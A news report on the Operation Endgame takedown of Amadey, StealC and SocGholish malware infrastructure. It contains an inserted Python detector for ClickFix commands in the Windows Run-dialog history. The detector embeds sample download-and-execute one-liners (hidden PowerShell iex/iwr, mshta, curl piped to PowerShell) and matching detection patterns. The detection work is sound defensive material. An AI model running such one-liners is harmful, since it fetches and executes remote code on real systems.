Amadey and StealC malware infrastructure dismantled in Operation Endgame

A coordinated international law enforcement action has disrupted the infrastructure behind the Amadey and StealC malware families, knocking out hundreds of servers and domains used by cybercriminal networks worldwide.

Microsoft, Europol, and partners from multiple countries identified and seized, blocked, or sinkholed infrastructure tied to both malware operations. According to Europol, the action disrupted 326 servers and 142 domains. Investigators also linked more than €41 million in cryptocurrency to criminal activity and recovered approximately 27 million stolen credentials from over 385,000 compromised systems.

The operation also targeted SocGholish (also known as FakeUpdates), a malware loader that is injected into compromised websites and infects visitors by serving them fake browser-update prompts that deliver the malware instead of an update.

Law enforcement agencies from Canada, Denmark, Germany, the Netherlands, the United Kingdom, and the United States participated, with Europol and Eurojust coordinating. Private-sector partners included Microsoft, ESET, Proofpoint, IBM X-Force, Bitsight, Infoblox, Orange Cyberdefense, Shadowserver, Have I Been Pwned, and Spamhaus.

Amadey is a malware loader and botnet that both ransomware gangs and state-sponsored groups have used to gain access to networks and drop additional payloads. StealC is an infostealer that harvests credentials, cryptocurrency wallets, and other sensitive data from infected machines. Both are sold as malware-as-a-service, with affiliates paying for access to builders, management panels, and infrastructure.

StealC has recently been distributed widely through ClickFix campaigns, in which victims are tricked into pasting and running attacker-supplied commands themselves (fake instructional videos on TikTok being one such lure), as well as through FileFix attacks that hide the payload using steganography. For its part, Microsoft's Digital Crimes Unit identified more than 200 malicious command-and-control domains and IP addresses linked to the two families.
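Because ClickFix lures depend on the victim pasting a command into the Windows Run dialog, the pasted command usually survives in the RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) even after the payload is gone. The script below is an added example, not part of this article or of any partner's published tooling: it scores RunMRU-style entries against patterns typical of ClickFix commands. The sample entries, the indicator names, and the two-hit threshold are assumptions chosen for illustration; the sample is constructed and does not come from the operation described here.

```python
"""Flag ClickFix-style commands in Windows Run-dialog history (RunMRU).

Windows stores Run-dialog input as REG_SZ values named "a", "b", ... under
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU, each
ending in a literal "\\1" marker, plus an "MRUList" value giving most-recent
order. This example (constructed, not from the real takedown) runs a small
heuristic over such entries. On a live host you would read the key with
winreg; here the values are embedded so the script runs offline anywhere.
"""
import re

# Constructed sample RunMRU values (assumption: typical ClickFix shapes).
SAMPLE_RUNMRU = {
    "a": r"notepad\1",
    "b": r"powershell -w hidden -nop -c "
         r"""iex (iwr 'https://example.invalid/v.txt' -UseBasicParsing)\1""",
    "c": r"mshta https://example.invalid/verify.hta\1",
    "d": r"cmd /c curl -s https://example.invalid/x | powershell -\1",
    "e": r"calc\1",
    "MRUList": "dcbae",  # most recent first: d, c, b, a, e
}

# Indicator name -> regex. Names are illustrative, not a vendor taxonomy.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("encoded_cmd", re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    # download-then-execute: iex ... iwr/curl, or a download tool piped onward
    ("download_exec", re.compile(
        r"\b(?:iex|invoke-expression)\b.*\b(?:iwr|invoke-webrequest|downloadstring|curl|wget)\b"
        r"|\b(?:iwr|invoke-webrequest|downloadstring|curl|wget|certutil|bitsadmin)\b.*\|",
        re.I)),
    ("remote_url", re.compile(r"https?://", re.I)),
    ("lolbin", re.compile(r"\b(?:mshta|rundll32|regsvr32|wscript|cscript|msiexec)\b", re.I)),
    # many ClickFix one-liners end with a "verification" comment to reassure the victim
    ("verify_comment", re.compile(r"#.*(?:not a robot|verif|captcha)", re.I)),
]


def strip_mru_marker(value):
    """Remove the trailing '\\1' that Windows appends to RunMRU values."""
    return value[:-2] if value.endswith("\\1") else value


def score_command(cmd):
    """Return the list of indicator names that match the command."""
    return [name for name, rx in INDICATORS if rx.search(cmd)]


def ordered_entries(mru):
    """Yield (key, command) pairs in MRUList order, most recent first."""
    order = mru.get("MRUList", "")
    return [(k, strip_mru_marker(mru[k])) for k in order if k in mru]


def find_suspicious(mru, min_hits=2):
    """Return entries that trip at least min_hits indicators (threshold is an assumption)."""
    findings = []
    for key, cmd in ordered_entries(mru):
        hits = score_command(cmd)
        if len(hits) >= min_hits:
            findings.append({"key": key, "command": cmd, "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_RUNMRU):
        print(f"[{f['key']}] {', '.join(f['indicators'])}: {f['command']}")
```

Two hits are required so that a lone URL or a bare `mshta` does not fire; a real deployment would add the interactive-user SID, the key's last-write time, and any child processes of explorer.exe that spawned shortly afterwards.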

The two malware families were tied to more than 140,000 infected devices during the first two weeks of May 2026 alone. ESET, for its part, counted roughly 50 domains and nearly 200 active C2 servers affected by the operation.

This is the latest phase of Operation Endgame, which previously disrupted DanaBot, Bumblebee, Rhadamanthys, VenomRAT, Elysium, and SmokeLoader. Takedowns that are not accompanied by arrests are commonly followed by the operators rebuilding their infrastructure and resuming business.